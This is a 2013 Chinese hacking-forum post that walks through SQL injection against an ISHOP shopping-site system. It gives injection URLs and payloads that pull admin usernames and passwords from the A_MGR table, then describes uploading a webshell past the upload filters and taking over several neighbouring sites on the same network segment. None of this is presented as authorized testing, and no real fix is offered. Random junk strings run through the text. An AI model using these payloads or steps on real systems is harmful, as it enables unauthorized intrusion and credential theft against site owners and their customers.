中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点
' V* C( z" ]$ e3 L+ y5 b% b4 ]* ^http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
1 p7 q' [$ m* S7 e9 Y5 a  K& @' I, X9 Y
习惯性的加’having1=1--6 S4 X4 s" M2 o" t3 w! J& K

( ], o: q# q; ]* }! `5 g6 V2 _5 }http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—8 F1 s9 l; \' V) K1 y
/ A7 O# s: d5 ]+ e+ t* t2 Y
0% G: w, ~% s4 v3 {

; s' n4 r/ A4 `% p" P& ]6 v. B9 c爆出Diary_A.dl_Title(这时候很激动啊)& Z9 {- \8 J( U0 q
9 d4 m4 X/ r" D1 ]
那么继续0 d) W9 u& ?  a
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—* S) ^6 Y( V& U% }" g+ O, W6 k! b

* s" I! j, E5 T( T继续,一直爆下去
" M9 N+ d  R* u, N. x$ k
2 ^4 Y+ y6 ]" f) F$ Z爆到几个字段和表段 但是没找到需要的管理用户的字段5 g/ i6 P  M# R7 x/ w9 o* G
; B( H8 E4 l0 \) M4 R! q5 v
蛋疼了 怎么办 然后去后台登陆页看源码
' ]9 v: D! c& }; J
' @0 q) n' Q/ v- Q/ \8 T8 Y& p0
6 F1 B5 S/ b$ J* B; b- |
: a4 `' u; c: O+ b: WInput name= “ADUID”
& |2 O$ l9 o7 \Input name= “ADPWD”
  Y& E" C. W( R9 q# J4 P7 S( T
很幸运 找到了字段那就继续
  f! V! [! a% s! k9 X找到之后开始爆用户3 @! ^# q4 z  K) u
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
2 s& K- r) q8 z' x爆密码- K+ Q/ Z. A7 J
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
7 Z. v& y5 y4 e/ W7 q测试了下 这个注入点只能爆到文章哪里的表 6 L2 w9 Y, m2 L+ U2 w9 F  B+ _

* j/ W6 F) Q/ G- Z& N头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
; Z( M+ e- U# x
7 [+ p5 P1 l2 V3 T! P又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
+ O" K$ \* W2 P% @. ^4 Q9 S) P2 [4 L% q1 G! n# z; d, L$ H! }
473# v1 D. b8 [' r& Q# c8 |5 I6 e
+ L* X: T5 ]1 M2 g
进后台
2 Z6 Y' N) z+ s. j" h1 |: A* d- z) _$ x+ S/ m& x8 o, ?  ^2 i
1 ?) e2 ?! A# w4 A1 C; t$ n
发现几个上传点 有的地方不能上传 而且防止恶意代码
" o5 N, C/ C3 K0 [  a1 k2 w* {6 J4 C4 v+ Z0 }/ {( f
没办法 各种百度各种找大牛 找到一只好像可以突破的马8 `4 T8 q3 F/ Y: z6 B
$ k6 p$ P; p& _
8 h% a( }% f: s$ d  @" a
在系统管理那里直接上传 不过没有显示地址
! D# i+ v) v- g, ?
9 A6 Z) x6 E- K1 m# w4 p再上传一次 抓包 搞定OK! w, z. j( N5 }: X

9 |9 o' E% I) [2 `9 b% I* X' |# j6 S3 w  A
0 a  C+ u( B- L
472+ N$ {& R' i. g3 l9 z! b

% b: X/ g" X8 ~% \+ [晚上不行了 去睡觉。。。! N; w- t9 F7 U0 O  X$ ~
第二天刚起床 闲的没事做继续日站吧 - V. ~' B, ^3 M* E, p7 D! v2 l- ^

! m/ J3 t* B  @9 T找个站 就把这个站的旁c扫了下2 R. b2 }# Y& H+ E# K5 [8 F

& @, V$ D  L. u% |发现c段也有一个购物站 ,然后还和这个站的模板差不多; B* s3 x4 ^# L5 L% N( c; C: I
, w/ U9 a' o! b6 I* j  {$ y2 a
就找到会员登录口测试6 x; z0 j' \# i- ~4 R6 f7 \4 i4 v1 v6 v

8 m5 ?) r& W) W5 h3 U'and (select top 1 MGR_UID from A_MGR)>0—
. a$ e# {! @( Z$ e& U5 w. k8 r/ A果断爆到了 这时候我很激动 通杀
; d8 b7 u. T/ s) A9 l2 q' ]' A# K  q$ h" [( O0 E5 g
再次翻c段
# S4 H5 w$ e7 b# c/ J8 \) r% t
翻出几个站 都成功拿下
5 S/ e  S+ L% w$ k) i. U% w: ?# _/ e* c, a, Y& z: s: s1 g
' [* X8 y) K7 B5 p( A
; x) J( U0 q: |; a* D% c
修复方案:
* W3 X# W! H  B% A+ w  }他们比我专业
& W! ]6 ?- {, G9 ]1 T
. R1 P5 E9 d: d; j, d/ x" Y" ]6 e5 |7 W

, s: j8 R$ c9 e/ I0 R* y



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2